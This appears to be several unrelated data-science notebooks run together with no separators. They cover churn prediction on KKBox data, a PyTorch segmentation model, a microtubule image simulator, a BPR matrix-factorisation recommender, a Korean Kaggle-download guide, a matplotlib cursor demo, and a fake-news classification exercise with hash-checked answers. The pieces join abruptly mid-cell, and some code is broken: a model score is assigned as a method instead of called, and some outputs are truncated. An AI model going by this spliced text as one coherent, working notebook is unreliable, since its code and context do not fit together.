-127.0 -107.0 -76.0 99.0 is_auto_renew 100000.[...]Merge data settrain = pd.merge(train,members,on='msno',how='left') test = pd.merge(test,members,on='msno',how='left') train = pd.merge(train,transactions,how='left',on='msno',left_index=True, right_index=True) test = pd.merge(test,transactions,how='left',on='msno',left_index=True, right_index=True,) train = pd.merge(train,user_log,how='left',on='msno',left_index=True, right_index=True) test = pd.merge(test,user_log,how='left',on='msno',left_index=True, right_index=True) del members,transactions,user_log print('Number of rows & columns',train.shape) print('Number of rows & columns',test.shape)Number of rows & columns (100000, 23) Number of rows & columns (100000, 23)Date featuretrain[['registration_init_time' ,'transaction_date','membership_expire_date','date']].describe() train[['registration_init_time' ,'transaction_date','membership_expire_date','date']].isnull().sum() train['registration_init_time'] = train['registration_init_time'].fillna(value=pd.to_datetime('09/10/2015')) test['registration_init_time'] = test['registration_init_time'].fillna(value=pd.to_datetime('09/10/2015')) def date_feature(df): col = ['registration_init_time' ,'transaction_date','membership_expire_date','date'] var = ['reg','trans','mem_exp','user_'] #df['duration'] = (df[col[1]] - df[col[0]]).dt.days for i ,j in zip(col,var): df[j+'_day'] = df[i].dt.day.astype('uint8') df[j+'_weekday'] = df[i].dt.weekday.astype('uint8') df[j+'_month'] = df[i].dt.month.astype('uint8') df[j+'_year'] =df[i].dt.year.astype('uint16') date_feature(train) date_feature(test)Data analysistrain.columnsMissing valuedef basic_details(df): k = pd.DataFrame() k['N unique values'] = df.nunique() k['Misssing value'] = df.isnull().sum() k['dtype'] = df.dtypes return k basic_details(train) col = [ 'city', 'bd', 'gender', 'registered_via'] def missing(df,columns): col = columns for i in col: df[i].fillna(df[i].mode()[0],inplace=True) missing(train,col) missing(test,col)is_churnplt.figure(figsize=(8,6)) sns.set_style('ticks') sns.countplot(train['is_churn'],palette='summer') plt.xlabel('The subscription within 30 days of expiration is True/False')Imbalanced data setmsno: user idis_churn: This is the target variable. Churn is defined as whether the user did not continue the subscription within 30 days of expiration. is_churn = 1 means churn,is_churn = 0 means renewal. Univariate analysisprint(train['city'].unique()) fig,ax = plt.subplots(2,2,figsize=(16,8)) ax1,ax2,ax3,ax4 = ax.flatten() sns.set(style="ticks") sns.countplot(train['city'],palette='summer',ax=ax1) #ax1.set_yscale('log') ax1.set_xlabel('City') #ax1.set_xticks(rotation=45) sns.countplot(x='gender',data = train,palette='winter',ax=ax2) #ax2.set_yscale('log') ax2.set_xlabel('Gender') sns.countplot(x='registered_via',data=train,palette='winter',ax=ax3) #ax3.set_yscale('') ax3.set_xlabel('Register via') sns.countplot(x='payment_method_id',data= train,palette='winter',ax=ax4) ax4.set_xlabel('Payment_method_id')[ 1. 13. 21. 4. 6. 5. 22. 15. 12. 10. 9. 14. 16. 8. 17. 11. 18. 3. 7. 20.]bd (birth day)print(train['bd'].describe()) fig,ax = plt.subplots(1,2,figsize=(16,8)) ax1,ax2 = ax.flatten() sns.set_style('ticks') sns.distplot(train['bd'].fillna(train['bd'].mode()[0]),bins=100,color='r',ax=ax1) plt.title('Distribution of birth day') plt.figure(figsize=(14,6)) sns.distplot(train.loc[train['bd'].value_counts()]['bd'].fillna(0),bins=50,color='b')/home/sudhir/anaconda3/lib/python3.6/site-packages/statsmodels/nonparametric/kde.py:488: RuntimeWarning: invalid value encountered in true_divide binned = fast_linbin(X, a, b, gridsize) / (delta * nobs) /home/sudhir/anaconda3/lib/python3.6/site-packages/statsmodels/nonparametric/kdetools.py:34: RuntimeWarning: invalid value encountered in double_scalars FAC1 = 2*(np.pi*bw/RANGE)**2Genderprint(pd.crosstab(train['is_churn'],train['gender']))gender female male is_churn 0 166 47504 1 256 52074registration_init_timeregi = train.groupby('registration_init_time').count()['is_churn'] plt.subplot(211) plt.plot(regi,color='b',label='count') plt.legend(loc='center') regi = train.groupby('registration_init_time').mean()['is_churn'] plt.subplot(212) plt.plot(regi,color='r',label='mean') plt.legend(loc='center') plt.tight_layout() regi = train.groupby('registration_init_time').mean()['is_churn'] plt.figure(figsize=(14,6)) sns.distplot(regi,bins=100,color='r')registrationfig,ax = plt.subplots(2,2,figsize=(16,8)) ax1,ax2,ax3,ax4 = ax.flatten() sns.countplot(train['reg_day'],palette='Set2',ax=ax1) sns.countplot(data=train,x='reg_month',palette='Set1',ax=ax2) sns.countplot(data=train,x='reg_year',palette='magma',ax=ax3) cor = train.corr() plt.figure(figsize=(16,12)) sns.heatmap(cor,cmap='binary',annot=False) plt.xticks(rotation=45)Encoderle = LabelEncoder() train['gender'] = le.fit_transform(train['gender']) test['gender'] = le.fit_transform(test['gender'])One Hot Encodingtest.head() def OHE(df1,df2): #col = df.select_dtypes(include=['category']).columns col = ['city','gender','registered_via'] print('Categorical columns in dataset',col) len_df1 = df1.shape[0] df = pd.concat([df1,df2],ignore_index=True) c2,c3 = [],{} for c in col: if df[c].nunique()>2 : c2.append(c) c3[c] = 'ohe_'+c df = pd.get_dummies(df,columns=c2,drop_first=True,prefix=c3) df1 = df.loc[:len_df1] df2 = df.loc[len_df1:] print(df1.shape,df2.shape) return df1,df2 train1, test1 = OHE(train,test)Categorical columns in dataset ['city', 'gender', 'registered_via'] (100001, 61) (100000, 61)Split data setunwanted = ['msno','is_churn','registration_init_time','transaction_date','membership_expire_date','date'] X = train1.drop(unwanted,axis=1) y = train1['is_churn'].astype('category') x_test = test1.drop(unwanted,axis=1)Hyper parameter tuninglog_reg = LogisticRegression(class_weight='balanced') param = {'C':[0.001,0.005,0.01,0.05,0.1,0.5,1,1.5,2,3]} rs_cv = RandomizedSearchCV(estimator=log_reg,param_distributions=param,random_state=seed) rs_cv.fit(X,y) print('Best parameter :{} Best score :{}'.format(rs_cv.best_params_,rs_cv.best_score_))Best parameter :{'C': 2} Best score :0.5073449265507345Logistic regression model with Stratified KFold splitkf = StratifiedKFold(n_splits=5,shuffle=True,random_state=seed) pred_test_full =0 cv_score =[] i=1 for train_index,test_index in kf.split(X,y): print('{} of KFold {}'.format(i,kf.n_splits)) xtr,xvl = X.loc[train_index],X.loc[test_index] ytr,yvl = y.loc[train_index],y.loc[test_index] #model lr = LogisticRegression(C=1) lr.fit(xtr,ytr) score = lr.score print('ROC AUC score:',score) cv_score.append(score) pred_test = lr.predict_proba(x_test)[:,1] pred_test_full +=pred_test i+=1 #lr.fit(X,y) #lr.score(X,y) #y_pred = lr.predict_proba(x_test)[:,1]Model validationprint(cv_score) print('\nMean accuracy',np.mean(cv_score)) confusion_matrix(yvl,lr.predict(xvl))[, , , Reciever Operating Charactaristicsy_proba = lr.predict_proba(X)[:,1] fpr,tpr,th = roc_curve(y,y_proba) plt.figure(figsize=(14,6)) plt.plot(fpr,tpr,color='r') plt.plot([0,1],[0,1],color='b') plt.title('Reciever operating Charactaristics') plt.xlabel('False positive rate') plt.ylabel('True positive rate')Predict for unseen data sety_pred = pred_test_full/kf.n_splits submit = pd.DataFrame({'msno':test['msno'],'is_churn':y_pred}) submit.to_csv('kk_pred.csv',index=False) #submit.to_csv('kk_pred.csv.gz',index=False,compression='gzip') submit.head()Define modelN, T, Din = x_train.shape _, Dout = y_train1hot.shape K = 6 Dhidden = 8 # hidden dimension # softmax regression with cross entropy loss (softmax performed in loss function) glm = nwarp.GeneralizedLinearModel(Dout, invlink_func=nn.Identity()) # TSP-based parameter warping with constant mode vector Dparamg = 0 # number of global parameters (same in every segment) Dparaml = Dhidden*Dout # number of local parameters (different in every segment) paramwarp = nwarp.ParameterWarp(K, Dparamg, Dparaml, nwarp.TSPStepWarp(nwarp.Constant((K-1,)), width=0.125, power=16., min_step=0.0001, max_step=0.9999)) # feature transformation for the covariates # map shape (T, Din) to shape (T, Dhidden) covariates = nn.Sequential( nn.Linear(Din, Dhidden), nn.ReLU(), ) print(covariates) print(paramwarp) print(glm) #glm(covariates(x_train), paramwarp(x_train)[0])Sequential( (0): Linear(in_features=33, out_features=8, bias=True) (1): ReLU() ) ParameterWarp( (warp): TSPStepWarp( (loc_net): Constant() ) (resample): Resample() ) GeneralizedLinearModel( (invlink_func): Identity() )Trainingn_restarts = 10 # number of randomized restarts n_epochs = 300 # total number of epochs n_epochs_hard = 100 # use hard segmentation for the last X epochs show_plots = True loss_fn = nn.CrossEntropyLoss(reduction='mean') best_loss = np.inf for r in range(n_restarts): # reset everything optimizer = torch.optim.Adam([ {'params': paramwarp.parameters(), 'lr': 1e-1}, {'params': covariates.parameters(), 'lr': 1e-1} ], weight_decay=0.0) param_norm = [] grad_norm = [] train_losses = [] resample_kernel = 'linear' epoch_counter = tqdm.tqdm(range(n_epochs), desc=f'restart {(r+1):2d}/{n_restarts:2d}') # initialize parameters _ = covariates.apply(nwarp.reset_parameters) _ = paramwarp.apply(nwarp.reset_parameters) nn.init.uniform_(paramwarp.warp.loc_net.const, -1., 0.) # segmentation # perform training paramwarp.train() covariates.train() for epoch in epoch_counter: optimizer.zero_grad() if epoch == n_epochs - n_epochs_hard: resample_kernel = 'integer' param_hat_train = paramwarp(x_train, # input is ignored, but must have shape (N, T, Din) resample_kernel=resample_kernel)[0] y_hat_train = glm(covariates(x_train), param_hat_train) loss = loss_fn(y_hat_train.squeeze(), y_train) loss.backward() optimizer.step() train_losses.append(loss.item()) param_norm.append([sl.norm(p.detach()) for p in paramwarp.parameters() if len(p)>0]) grad_norm.append([sl.norm(p.grad.detach()) for p in paramwarp.parameters() if len(p)>0]) epoch_counter.set_postfix({'max': f'{max(train_losses):.4f}', 'cur': f'{loss.item():.4f}'}) if train_losses[-1] < best_loss: best_paramwarp_state = deepcopy(paramwarp.state_dict()) best_covariates_state = deepcopy(covariates.state_dict()) best_loss = train_losses[-1] if show_plots: plt.figure(figsize=(15,2)) plt.subplot(131) plt.title('loss') plt.ylim(np.min(train_losses), np.percentile(train_losses, 95)) plt.plot(train_losses) plt.subplot(132) plt.title('parameter norm') lines = plt.plot(np.array(param_norm)/np.array(param_norm).max(axis=0)) plt.legend(lines, [' x '.join([str(d) for d in p.size()]) for p in paramwarp.parameters() if len(p)>0]) plt.subplot(133) plt.title('gradient norm') normalized_grad_norm = np.array(grad_norm)/np.array(grad_norm).max(axis=0) lines = plt.plot(normalized_grad_norm) plt.legend(lines, [' x '.join([str(d) for d in p.size()]) for p in paramwarp.parameters() if len(p)>0]) plt.ylim(np.min(normalized_grad_norm), np.percentile(normalized_grad_norm, 95)) plt.show() paramwarp.eval() covariates.eval() paramwarp.load_state_dict(best_paramwarp_state) covariates.load_state_dict(best_covariates_state) print(f'best loss = {best_loss:.4f}') param_hat_train, almat_hat_train, gamma_hat_train = paramwarp(x_train, # input is ignored, but must have shape (N, T, Din) resample_kernel=resample_kernel) y_hat_train = glm(covariates(x_train), param_hat_train) print(dataset) print(f'{K:2.0f}', f'{torch.sum(y_hat_train.argmax(-1) == y_train).item()/T:.2f}', end=' ') print() print('cps =', end=' ') for cp in almat_hat_train.sum(dim=1).cumsum(dim=1).squeeze()[:-1]: print(f'{cp.item():.0f}', end=' ') print()INSECTS-abrupt_balanced 6 0.74 cps = 12748 18068 28104 38266 46879Field of View SimulatorShow how to a microscope field of view with many microtubules.%load_ext autoreload %autoreload 2 %matplotlib inline from pathlib import Path import sys sys.path.append("../") import anamic import numpy as np import matplotlib.pyplot as plt # Common Parameters pixel_size = 110 # nm/pixel image_size_pixel = 512 # Per image parameters image_parameters = {} image_parameters['n_mt'] = {} image_parameters['n_mt']['values'] = np.arange(80, 120) image_parameters['n_mt']['prob'] = 'uniform' image_parameters['signal_mean'] = {} image_parameters['signal_mean']['values'] = {'loc': 700, 'scale': 10} image_parameters['signal_mean']['prob'] = 'normal' image_parameters['signal_std'] = {} image_parameters['signal_std']['values'] = {'loc': 100, 'scale': 1} image_parameters['signal_std']['prob'] = 'normal' image_parameters['bg_mean'] = {} image_parameters['bg_mean']['values'] = {'loc': 500, 'scale': 10} image_parameters['bg_mean']['prob'] = 'normal' image_parameters['bg_std'] = {} image_parameters['bg_std']['values'] = {'loc': 24, 'scale': 1} image_parameters['bg_std']['prob'] = 'normal' image_parameters['noise_factor'] = {} image_parameters['noise_factor']['values'] = {'loc': 1, 'scale': 0.1} image_parameters['noise_factor']['prob'] = 'normal' image_parameters['noise_factor']['values'] = [0.5] image_parameters['noise_factor']['prob'] = [1] image_parameters['mask_line_width'] = 4 # pixel image_parameters['mask_backend'] = 'skimage' # Per microtubule parameters. microtubule_parameters = {} microtubule_parameters['n_pf'] = {} microtubule_parameters['n_pf']['values'] = [11, 12, 13, 14, 15] microtubule_parameters['n_pf']['prob'] = [0.05, 0.05, 0.3, 0.1, 0.5] microtubule_parameters['mt_length_nm'] = {} microtubule_parameters['mt_length_nm']['values'] = np.arange(500, 10000) microtubule_parameters['mt_length_nm']['prob'] = 'uniform' microtubule_parameters['taper_length_nm'] = {} microtubule_parameters['taper_length_nm']['values'] = np.arange(0, 1000) microtubule_parameters['taper_length_nm']['prob'] = 'uniform' microtubule_parameters['labeling_ratio'] = {} microtubule_parameters['labeling_ratio']['values'] = [0.08, 0.09, 0.10, 0.11, 0.12, 0.13] microtubule_parameters['labeling_ratio']['prob'] = 'uniform' microtubule_parameters['pixel_size'] = pixel_size # nm/pixel microtubule_parameters['x_offset'] = 2000 # nm microtubule_parameters['y_offset'] = 2000 # nm microtubule_parameters['psf_size'] = 135 # nm image, masks, mts = anamic.simulator.create_fov(image_size_pixel, pixel_size, microtubule_parameters, image_parameters, return_positions=True) fig, axs = plt.subplots(ncols=2, figsize=(12, 6)) im = axs[0].imshow(image) #fig.colorbar(im, ax=axs[0]) axs[1].imshow(masks.max(axis=0))BPR-MF modelimport numpy as np import pandas as pd from collections import defaultdict import matplotlib.pyplot as plt from datetime import datetime from tqdm.notebook import tqdm import warnings, random warnings.filterwarnings('ignore') !wget -q --show-progress https://github.com/sparsh-ai/stanza/raw/S629908/rec/CDL/data/ml_100k_train.npy # data loading train = np.load('ml_100k_train.npy') train.shape train = np.array(train > 0, dtype=float) class Config: learning_rate = 0.01/2 weight_decay = 0.1/2 early_stopping_round = 0 epochs = 50 seed = 1995 dim_f = 20 alpha = 100 bootstrap_proportion = 0.5 config = Config() def item_per_user_dict(data): item_per_user = defaultdict(list) user_pos = np.nonzero(data != 0)[0] item_pos = np.nonzero(data != 0)[1] for u, i in zip(user_pos, item_pos): item_per_user[u].append(i) return item_per_user class BPR_MF: def __init__(self, data): self.data = data self.user_num = data.shape[0] self.item_num = data.shape[1] self.user_pos = data.nonzero()[0] self.item_pos = data.nonzero()[1] self.train_hist = defaultdict(list) self.valid_hist = defaultdict(list) self.W = np.random.standard_normal((self.user_num, config.dim_f)) self.H = np.random.standard_normal((self.item_num, config.dim_f)) def sampling_uij(self, item_per_user): u = np.random.choice(self.user_num) rated_items = item_per_user[u] i = np.random.choice(rated_items) j = np.random.choice(self.item_num) return u, i, j, rated_items def fit(self): train_per_user, test_per_user = self.train_test_split(self.data) n = len(self.user_pos) for epoch in range(config.epochs): preds = [] num_update_per_epoch = 0 while num_update_per_epoch <= n*config.bootstrap_proportion: u, i, j, rated_items = self.sampling_uij(train_per_user) if j not in rated_items: xuij = self.gradient_descent(u, i, j) num_update_per_epoch += 1 preds.append(xuij) auc = np.where(np.array(preds) > 0, 1, 0).mean() auc_vl = self.evaluate(train_per_user, test_per_user) self.train_hist[epoch] = auc; self.valid_hist[epoch] = auc_vl if epoch == 0 or (epoch + 1) % 10 == 0: print(f'EPOCH {epoch+1} TRAIN AUC: {auc}, TEST AUC {auc_vl}') def scoring(self, u, i, j): xui = np.dot(self.W[u, :], self.H[i, :]) xuj = np.dot(self.W[u, :], self.H[j, :]) xuij = np.clip(xui - xuj, -500, 500) return xui, xuj, xuij def gradient(self, u, i, j): xui, xuj, xuij = self.scoring(u, i, j) common_term = np.exp(-xuij) / (np.exp(-xuij) + 1) dw = common_term * (self.H[i, :] - self.H[j, :]) + config.weight_decay*self.W[u, :] dhi = common_term * self.W[u, :] + config.weight_decay*self.H[i, :] dhj = common_term * -self.W[u, :] + config.weight_decay*self.H[j, :] return dw, dhi, dhj, xuij def gradient_descent(self, u, i, j): dw, dhi, dhj, xuij = self.gradient(u, i, j) self.W[u, :] = self.W[u, :] + config.learning_rate*dw self.H[i, :] = self.H[i, :] + config.learning_rate*dhi self.H[j, :] = self.H[j, :] + config.learning_rate*dhj return xuij def train_test_split(self, data): train_per_user = item_per_user_dict(data) test_per_user = {} for u in range(self.user_num): temp = train_per_user[u] length = len(temp) test_per_user[u] = temp.pop(np.random.choice(length)) train_per_user[u] = temp return train_per_user, test_per_user def evaluate(self, train_per_user, test_per_user): X = np.dot(self.W, self.H.T) item_idx = set(np.arange(self.item_num)) auc = [] for u in range(self.user_num): i = test_per_user[u] j_s = list(item_idx - set(train_per_user[u])) auc.append(np.mean(np.where(X[u, i] - X[u, j_s] > 0, 1, 0))) return np.mean(auc) def plot_loss(self): fig, ax = plt.subplots(1,1, figsize=(10, 5)) ax.plot(list(self.train_hist.keys()), list(self.train_hist.values()), color='orange', label='train') ax.plot(list(self.valid_hist.keys()), list(self.valid_hist.values()), color='green', label='valid') plt.legend() plt.show() model = BPR_MF(train) model.fit() model.plot_loss()---!pip install -q watermark %reload_ext watermark %watermark -a "Sparsh A." -m -iv -u -t -dAuthor: . Last updated: 2021-11-28 15:57:49 Compiler : GCC 7.5.0 OS : Linux Release : 5.4.104+ Machine : x86_64 Processor : x86_64 CPU cores : 2 Architecture: 64bit IPython : 5.5.0 numpy : 1.19.5 pandas : 1.1.5 matplotlib: 3.2.2Kaggle Dataset 다운로드 방법여기의 가이드는 아래 참조 페이지를 바탕으로 작성 했습니다.참조- https://github.com/Kaggle/kaggle-api Kaggle Python 패키지 다운로드kaggle 패키지를 다운로드 받습니다.! pip install --user kaggleRequirement already satisfied: kaggle in /home/ec2-user/.local/lib/python3.6/site-packages (1.5.10) Requirement already satisfied: python-slugify in /home/ec2-user/.local/lib/python3.6/site-packages (from kaggle) (4.0.1) Requirement already satisfied: tqdm in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (4.42.1) Requirement already satisfied: python-dateutil in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (2.8.1) Requirement already satisfied: requests in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (2.22.0) Requirement already satisfied: urllib3 in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (1.25.11) Requirement already satisfied: certifi in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from kaggle) (2020.6.20) Requirement already satisfied: six>=1.10 in /home/ec2-user/anaconda3/envs/python3/lib/python3.6/site-packages (from[...]kaggle.json 다운로드 및 업로드- 케글 홈페이지 이동 ( https://www.kaggle.com )- 계정 로그인 (없으면 생성하세요)- 개인 Profile 로 이동 (페이지 오른쪽 상단에 본인 사진 클릭)- Account 탭에서 Create New API Token 클릭 - ![create_kaggle_json.png](img/create_kaggle_json.png) 위의 작업 이후에 kaggle.json 이 로컬 컴퓨터에 다운로드 됩니다. - kaggle.json 은 kaggle에 접속하기 위한 인증 정보가 있습니다.- 이후 kaggle.json 파일 다운로드 후에 노트북 인스턴스에 업로드 - 이후 현재 폴더 위치 ( ~/MLBootCamp/banking-fraud/ ) 에 업로드 함 - ![kaggle_json_file.png](img/kaggle_json_file.png) Kaggle Dataset API 카피아래 처럼 다운로드 받고자 하는 Kaggle 페이지로 이동하신 후에 클릭 하시면 API 명령어가 복사 됩니다. ( ```kaggle datasets download -d ntnu-testimon/paysim1``` )- ![Kaggle_API.png](img/Kaggle_API.png) - 업로딩한 kaggle.json 파일 카피로컬 노트북에 업로딩한 kaggle.json 으로 이제 다운로드 해보겠습니다.downlaod_dir = 'download_data' # 다운로드 폴더 data_dir = 'data' # 다운로드 한 파일을 압축한 후에 저장할 폴더아래 셀을 실행해서 403 Forbidden 에러가 발생하면, Kaggle 해당 페이지에 들어가서 약관에 동의 (Understand and Agree) 를 클릭 하시면 됩니다.%%sh -s {downlaod_dir} # Shell 에 downlaod_dir 폴더 인자로 넘김 mkdir -p ~/.kaggle # 유저의 홈디렉토리에 .kaggle 폴더 생성 cp kaggle.json ~/.kaggle/kaggle.json # 현재 폴더의 kaggle.json 파일을 복사 chmod 600 ~/.kaggle/kaggle.json # kaggle.json을 오너만 읽기, 쓰기 권한 할당 export PATH=$PATH:/home/ec2-user/.local/bin # kaggle 명령어를 실행어를 어디서나 실행하기 위해 Path 설정 # 아래 명령어는 위에서 Kaggle Dataset API 복사 된 것을 붙이기 하세요 # 그리고 $1 만 붙여 주세요 kaggle datasets download ntnu-testimon/paysim1 -p $1 # kaggle 명령어 실행해서 다운로드Downloading paysim1.zip to download_data데이터 압축 해제%%sh -s {downlaod_dir} {data_dir} mkdir -p $2 # data_dir 폴더 생성 unzip $1/paysim1.zip -d $2 rm -rf $1 # downlaod_dir 폴더 제거Archive: download_data/paysim1.zip inflating: data/PS_20174392719_1491204439457_log.csvMulticursorShowing a cursor on multiple plots simultaneously.This example generates two subplots and on hovering the cursor over data in onesubplot, the values of that datapoint are shown in both respectively.import numpy as np import matplotlib.pyplot as plt from matplotlib.widgets import MultiCursor t = np.arange(0.0, 2.0, 0.01) s1 = np.sin(2*np.pi*t) s2 = np.sin(4*np.pi*t) fig, (ax1, ax2) = plt.subplots(2, sharex=True) ax1.plot(t, s1) ax2.plot(t, s2) multi = MultiCursor(fig.canvas, (ax1, ax2), color='r', lw=1) plt.show()BLU09 - Information Extraction# importing needed packages here import os import re import spacy import hashlib import numpy as np import pandas as pd from tqdm import tqdm from collections import Counter from spacy.matcher import Matcher from sklearn.metrics import accuracy_score from nltk.tokenize import WordPunctTokenizer from sklearn.preprocessing import StandardScaler from sklearn.ensemble import RandomForestClassifier from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.model_selection import train_test_split from sklearn.base import BaseEstimator, TransformerMixin from sklearn.feature_extraction.text import TfidfVectorizer def _hash(s): return hashlib.sha256( bytes(str(s), encoding='utf8'), ).hexdigest() cpu_count = int(os.cpu_count()) if os.cpu_count() != None else 4In this learning unit you are going to tackle with a quite real problem: **Detecting fake news!** Let's create a binary classifier to determine if a piece of news is considered 'reliable' or 'unreliable'. You will start by building some basic features, then go on to build more complex ones, and finally putting it all together. You should be able to have a working classifier by the end of the notebook. DatasetThe dataset we will be using is the [Fake News](https://www.kaggle.com/c/fake-news/overview) from Kaggle. Each piece of news is either reliable or trustworthy, '0', or unreliable and possibly fake, '1'. First, let's load it up and see what we are dealing with.data_path = "datasets/fakenews/train.csv" df = pd.read_csv(data_path, index_col=0) df["title"] = df["title"].astype(str) df["text"] = df["text"].astype(str) df = df[:5000] df.head()We can see that we have 4 columns that are pretty self-explanatory, let's drop the author column since we only want to practice our text analysis, drop title as well for simplicity sake.df.drop(columns=["author", "title"], inplace=True) # Let's also load Spacy's model with merged entities (which will come in handy later) and stopwords nlp = spacy.load('en_core_web_sm') nlp.add_pipe("merge_entities", after="ner") en_stopwords = nlp.Defaults.stop_words # Let's get the text of the news article processed by SpaCy - This might take a while depending on # your hardware (a break to walk the dog? 🐶) docs = list(tqdm(nlp.pipe(df["text"], batch_size=20, n_process=cpu_count-1), total=len(df["text"]))) docs[:3]Overall, the text looks good! Not too many errors, well written... as expected from a news article. Fake news is a very tough, recent problem that is now appearing more and more frequently in the wild, usually there aren't many ortographic mistakes or slang (as it may happen with spam - another text classification problem!) since it's coming from news sources that want to be/appear credible but also clickbaity so they can profit on that good ad revenue and create distrust.Nevertheless, it is always good to process any textual information in order to normalize it, remove stopwords and punctuation so we can extract the most important parts of the text. Q1. Text Cleaning Q1.a)With our new previously acquired knowledge, let's remove any stopwords and punctuation from our text column.tokenizer = WordPunctTokenizer() def remove_punctuation(text): """ Hint: Remember the good old RegEx from 2 LUs ago how can I just remove everything except words, digits and spaces? """ # text = re.sub(...) # YOUR CODE HERE raise NotImplementedError() return text.lower() def remove_stopwords(text, stopwords): """ Hint: You may want to split the text into tokens using the tokenizer, it might help when searching for stopwords If you do, do not forget to join the tokens afterwards! """ # YOUR CODE HERE raise NotImplementedError() # Return the full string again here return text_processed def preprocess_text(df): df_processed = df.copy() df_processed["text"] = df_processed["text"].apply(remove_punctuation) assert _hash(df_processed["text"].values) == "9c34086ca91f5845a1069878dd4fd7fcf54826bdf02a0240f644b78257b73137", \ "it appears you are not removing all of the punctuation, read the hint 😉." df_processed["text"] = df_processed["text"].apply(remove_stopwords, stopwords = en_stopwords) assert _hash(df_processed["text"].values) == "e10c9b012ef768908431c03fdc7bf0ae6b11cd2004397f93a9bd262b5d432b8f", \ "something wrong with removing stopwords, read the hints!" return df_processed df_processed = preprocess_text(df) assert df_processed.shape == (5000, 2), "something is wrong with the shape of the dataframe"Q1.b)With our text processed, let's get a baseline model for our classification problem! Let's use our comfortable _TfidfVectorizer_ to get a simple, fast and trustworthy baseline.def baseline_with_tfidf(X_train, X_test, y_train, y_test): """ Train a Random Forest using sklearn's Pipeline and return the trained model and its accuracy in the test set. """ # pipe = (...) # pipe.fit(...) # (...) # YOUR CODE HERE raise NotImplementedError() return pipe, acc X_train, X_test, y_train, y_test = train_test_split(df_processed["text"], df_processed["label"], test_size=0.2, random_state=42, stratify=df_processed["label"]) baseline_model, baseline_acc = baseline_with_tfidf(X_train, X_test, y_train, y_test) # asserts assert isinstance(baseline_model, Pipeline) assert _hash(baseline_model[0]) == "5d9dc3620e12f84e4f957a7b00db14e15ebcc5d20cbc1f883940318fbb5442d5", "Something\ is wrong! Use the default parameters!" assert _hash(baseline_model[1]) == "7ab1fd7f03f247b36ba389a0a2eb8767ed2f1d2535f8e295669ac5ae2319d3c8", "Something\ is wrong! Use the default parameters!" assert np.allclose(baseline_acc, 0.908, 0.01), "something wrong with the accuracy score. Use the default parameters."Wow, the accuracy is quite good for such a simple text model! This just proves that, a starting trustworthy baseline is all you need. I can't stress enough that it's really important to have a simple first iteration, and afterwards we can add complexity and study which features do make sense or not, testing more out of the box solutions. Sometimes, data scientists focus right off the bat on the most complex solutions and a simple one would be enough. Real life problems will obviously achieve lower scores as the datasets are not controlled or cleaned for you but that should not stop you from starting with a simpler and easier solution.Now let's see if adding new features we can still improve our model! Q2. SpaCy MatcherLet's see if we can extract some useful features by using our SpaCy Matcher. Q2.a) Simple MatcherYou think of some words that could be related with the detection of Fake News. Something starts ringing in your mind about "propaganda", "USA" and "fraud", so you decide to check how many of those words appear in our news articles using the SpaCy Matcherwords = ["propaganda", "USA", "fraud"] # init the matcher - remember it from the learning notebook # add the patterns of the words. HINT: for a direct match you need a specific pattern (check SpaCy docs) # count how many matches! # YOUR CODE HERE raise NotImplementedError() # count = ... assert _hash(count) == "47fec9f491173c57c1d5b35dfefdb69cba6bd61bfbadea64015a65120efa15a0"Q2.b) POS-Tagging SearchYour head is still working new theories. You start thinking that, fake news might exaggerate on adjectives and adverbs by sharing exaggerated or over the top descriptions. So you decide to create a feature that counts the number of _Adjectives_ and _Adverbs_ in a piece of news article.# HINT: you already have your news text processed (the docs variable), # so you can go over every doc and check if there is any POS Tag which is an ADJ or ADV # to check the POS tag of a token in a doc -----> token.pos_ """ Try it out by running the below code! for token in docs[0]: print(token.pos_) """ # Return a list with the number of adjectives and adverbs for every piece of news in docs # nb_adj_adv = [...] # YOUR CODE HERE raise NotImplementedError() assert type(nb_adj_adv) == list, "the variable should be a list with just 1 dimension." assert len(nb_adj_adv) == 5000, "the length of the array is wrong. You should have a count for every news article." value_hash = "2488c9b42fd6efc018e0857683cc782347c4a09763a5d94579ca41425d4b6f64" assert _hash(nb_adj_adv) == value_hash df_processed["nb_adj_adv"] = nb_adj_advQ2.c) Entity SearchAnother theory that might be worth testing is that people and organizations are often involved in this kind of news. Nowadays, a lot of fake news are often shared by these to justify or divert attention to/from their actions. You think that, another smart feature could be to analyse if there are any known identities (people and/or organizations) that might be closely related with fake news.In order to do this, you decide to create a Matcher that searches for _People_ and identifies which are the ones that appear most frequently in our piece of news. **Let's find the top 10!**# I'll reset the matcher for you matcher = Matcher(nlp.vocab) # pattern = [...] to find people entities # matcher.add("", pattern) # for doc in docs: # do matches and save the text in a list # count the number of times the same Person appears on the list (hint: remember the dictionary solution...) # only take the top 10 of the counter! THE RESULT SHOULD BE A LIST # most_common_ents = ... # YOUR CODE HERE raise NotImplementedError() assert type(most_common_ents) == list, "the output is not a list" assert len(most_common_ents) == 10, "It should be the highest 10 people!" value_hash = "95983e691298df0238a6d47e54fff172a5166924dfdad865a3ce4f6ac6c52cf6" assert _hash(most_common_ents) == value_hashWell, now I'm curious to see who is on the top 10. Since this dataset is from the USA, I think we can already deduce who is going to show up in the listmost_common_entsAs expected, we have some known names here. The matcher was also able to detect full names and join then in a single occurrence (when they appeared together in the sentence). This was only possible since we called the following line`nlp.add_pipe("merge_entities", after="ner")`before processing the documents with SpaCy. If we didn't, every name would be considered independent even when belonging to the same person.We can also check how many times do these people appear for each label of news!for person, _ in most_common_ents: print(person) print(df[df['text'].str.contains("")].label.value_counts()) print()From the distribution it might not be a useful feature at all :( Q3. Feature UnionsNow the only thing missing is to create a Feature Union that allows us to join the features we have so far and see if we can actually improve our baseline modelclass Selector(BaseEstimator, TransformerMixin): """ Transformer to select a column from the dataframe to perform additional transformations on """ def __init__(self, key): self.key = key def fit(self, X, y=None): return self class TextSelector(Selector): """ Transformer to select a single column from the data frame to perform additional transformations on Use on text columns in the data """ def transform(self, X): return X[self.key] class NumberSelector(Selector): """ Transformer to select a single column from the data frame to perform additional transformations on Use on numeric columns in the data """ def transform(self, X): return X[[self.key]]Q3.a) Adding Extra FeaturesFirst off, there are some simple features that we can extract from the dataset to try and to enrich our model! Let's add to our dataframe the following features: **number of words in the doc**, **length of the doc** and **average word length**. Remember we already have the **number of adjectives and adverbs** that we also want to use.# 